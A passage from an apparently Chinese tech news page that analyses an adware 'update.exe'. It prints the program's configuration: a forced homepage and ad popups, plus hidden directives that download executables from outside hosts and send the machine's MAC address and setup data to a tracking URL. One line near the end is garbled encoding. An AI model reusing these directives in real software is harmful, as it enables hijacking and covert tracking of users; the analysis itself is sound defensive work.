扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
在本页阅读全文(共3页)
对UPDATE的分析
显性动作
[SetHomePage] Url=http://www.9991.com/
[PopupIE] Url=http://www.chanet.com.cn/click.cgi?a=6606&d=3086&u=
[PopupIE] Url=http://www.b2b2.net/51gg/index.html
[PopupIE] Url=http://www.7mp3.com
[PopupIE] Url=http://www.600001.com/
[PopupIE] Url=http://www.600005.com/
隐性动作
[Actions]访问 Url=http://file.qqhelper.com/up/update.dat
[Update]升级 Url=http://www.yulexingkong.com/mop/uninstalldrv.exe
[Update] Url=http://www.ha0l23.com/softbaby/uninstalltmp.exe
[Update] Url=http://tongji.qqhelper.com/tj/tj?setupid=$(setupid)&mac=$(computerid)&type=$(sendflag)&version=$(version)&exeversion=$(exeversion)&setupdate=$(setupdate)
在机器生成以下目录以及文件:
C:Program FilesCommon FilesUPDATE
update.dat
update.exe
以上动作都是update.exe干的
另外生成一个目录以及文件:
C:Program FilesCommon FilesSAND
updatesr.ini
svr.dat
qqfacerclient.exe
twunk_8.exe
还没有看到具体动作,有潜伏期。
婵″倹鐏夐幃銊╂姜鐢瓕鎻╅崚鍥╂畱閹厖绨$憴顤廡妫板棗鐓欓張鈧弬棰侀獓閸濅椒绗岄幎鈧張顖欎繆閹垽绱濋柇锝勭疄鐠併垽妲勯懛鎶姐€婄純鎴炲Η閺堫垶鍋栨禒璺虹殺閺勵垱鍋嶉惃鍕付娴f娊鈧柨绶炴稊瀣╃閵嗭拷
京公网安备 11010802021500号